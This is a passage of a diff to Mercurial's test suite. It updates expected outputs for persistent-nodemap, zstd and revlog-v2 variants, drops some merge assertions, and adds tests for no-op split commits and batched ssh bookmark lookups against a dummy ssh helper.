testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +Check that sidedata capabilities are advertised + $ hg debugcapabilities . | grep sidedata + exp-wanted-sidedata=1,2 + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=2,3 + +Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002) + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + + +We expect the target to have sidedata that was generated by the source on push, +and also removed the sidedata categories that are not supported by the target. +Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated), +but not entry-0001. + + $ hg push -r . ../target-repo --traceback + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg log -G + o changeset: 2:40f977031323 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: aa + | + o changeset: 1:2707720c6597 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: b + | + o changeset: 0:7049e48789d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a + + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + entry-0003 size 48 + '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ cd .. + +(Pull) Target has strict superset of the source +----------------------------------------------- + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + + $ cd ../target-repo + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that it generated on-the-fly during pull + $ hg pull -r . ../source-repo --traceback + pulling from ../source-repo + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + new changesets 7049e48789d7:40f977031323 + (run 'hg update' to get a working copy) + $ hg debugsidedata -c 0 --traceback + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v --traceback + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,11 +56,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes format-variant repo config default @@ -69,11 +71,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null @@ -88,11 +92,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no format-variant repo config default @@ -101,10 +107,12 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null diff --git a/tests/test-simplemerge.py b/tests/test-simplemerge.py --- a/tests/test-simplemerge.py +++ b/tests/test-simplemerge.py @@ -141,8 +141,6 @@ """No conflicts because nothing changed""" m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb']) - self.assertEqual(m3.find_unconflicted(), [(0, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)], @@ -189,8 +187,6 @@ [b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb'] ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)], @@ -271,8 +267,6 @@ [b'aaa\n', b'222\n', b'bbb\n'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)], @@ -323,8 +317,6 @@ [b'aaa', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)], @@ -338,8 +330,6 @@ [b'aaa', b'222', b'222', b'222', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)], diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -38,6 +40,8 @@ exp-sparse fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -57,6 +61,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1046,3 +1046,101 @@ [ ui.warning|rollback completed] [ ui.error|abort: empty commit message] [10] + +Test that creating an empty split or "no-op" +(identical to original) commit doesn't cause chaos +-------------------------------------------------- + + $ hg init $TESTTMP/noop + $ cd $TESTTMP/noop + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ printf 'd\na\n' | HGEDITOR=cat hg split || true + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + HG: Splitting ae694b2901bb. Write commit message for the first split changeset. + foo + + + HG: Enter commit message. Lines beginning with 'HG:' are removed. + HG: Leave message empty to abort commit. + HG: -- + HG: user: test + HG: branch 'default' + HG: added foo + warning: commit already existed in the repository! + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + +Now try the same thing but modifying the message so we don't trigger the +identical changeset failures + + $ hg init $TESTTMP/noop2 + $ cd $TESTTMP/noop2 + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ cat > $TESTTMP/messages <<EOF + > message1 + > EOF + $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset. + EDITOR: foo + EDITOR: + EDITOR: + EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed. + EDITOR: HG: Leave message empty to abort commit. + EDITOR: HG: -- + EDITOR: HG: user: test + EDITOR: HG: branch 'default' + EDITOR: HG: added foo + created new head + saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:de675559d3f9 message1 (obsstore-off !) + @ draft 2:de675559d3f9 message1 (obsstore-on !) + | + o public 0:222799e2f90b r0 + +#if obsstore-on + $ hg debugobsolete + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) +#endif diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -31,6 +33,8 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -49,6 +53,8 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,6 +68,8 @@ exp-sqlite-comp-001=none fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t new file mode 100644 --- /dev/null +++ b/tests/test-ssh-batch.t @@ -0,0 +1,15 @@ + $ hg init a + $ cd a + $ touch a; hg commit -qAm_ + $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done) + $ hg clone . ../b -q + $ cd ../b + +Checking that when lookup multiple bookmarks in one go, if one of them +fails (thus causing the sshpeer to be stopped), the errors from the +further lookups don't result in tracebacks. + + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a + pulling from ssh://user@dummy/$TESTTMP/b/../a + abort: unknown revision 'nosuchbookmark' + [255] diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -72,8 +72,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -94,8 +96,10 @@ $ hg -R local-stream book mybook $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2 streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -482,9 +486,11 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) sending protocaps command preparing listkeys for "bookmarks" diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -1,3 +1,10 @@ +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] @@ -56,8 +63,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -109,8 +116,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -235,8 +242,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -293,8 +300,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -359,8 +366,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -418,8 +425,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -485,8 +492,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -543,8 +550,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -609,8 +616,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -668,8 +675,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -735,8 +742,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -796,8 +803,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -865,8 +872,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -923,8 +930,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -989,8 +996,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1050,8 +1057,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1119,8 +1126,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1180,8 +1187,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1255,8 +1262,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1314,8 +1321,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1382,8 +1389,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1441,8 +1448,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1511,8 +1518,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1572,8 +1579,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1650,8 +1657,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap 